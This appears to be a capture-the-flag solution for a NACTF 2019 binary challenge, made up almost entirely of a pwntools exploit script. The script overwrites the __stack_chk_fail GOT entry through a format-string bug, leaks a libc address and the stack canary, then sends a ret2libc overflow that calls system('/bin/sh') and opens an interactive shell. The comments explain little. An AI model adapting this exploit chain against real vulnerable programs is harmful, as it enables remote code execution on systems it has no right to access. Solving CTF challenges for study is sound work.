Rating:
```
from pwn import *
r= remote('shell.2019.nactf.com', 31732)
__stack_chk_fail = 0x0804c014
_start = 0x08049090
# overwrite __stack_chk_fail() to _start(), then trigger __stack_chk_fail()
# format offset is 7
payload = fmtstr_payload(7, {__stack_chk_fail: _start})
r.sendlineafter('Type something>', payload + 'a'*(64-len(payload))+'aaaaaa')
# trigger __stack_chk_fail()
# leak libc offset , then get system() '/bin/sh' addresses
r.sendlineafter('Type something>', p32(0x0804c018) + '%7$s' +'a'*(64-8) + "aaaa")
r.recvuntil('You typed: ')
libc = ELF('libc.so.6')
r.recv(4)
libc_off = u32(r.recv(4)) - libc.symbols['fwrite']
system_adr = libc_off + libc.symbols['system']
binsh = libc.search('/bin/sh').next() + libc_off
# trigger __stack_chk_fail()
# leak main() canary
r.sendlineafter('Type something>', '%31$x '+'a'*(32-6) + 'b'*36)
r.recvuntil('You typed: ')
canary = int(r.recvuntil(' ').strip(),16)
r.sendlineafter('Type something>', 'a'*64 + p32(canary) + 'a'*12 + p32(system_adr)*2 + p32(binsh))
r.interactive()
```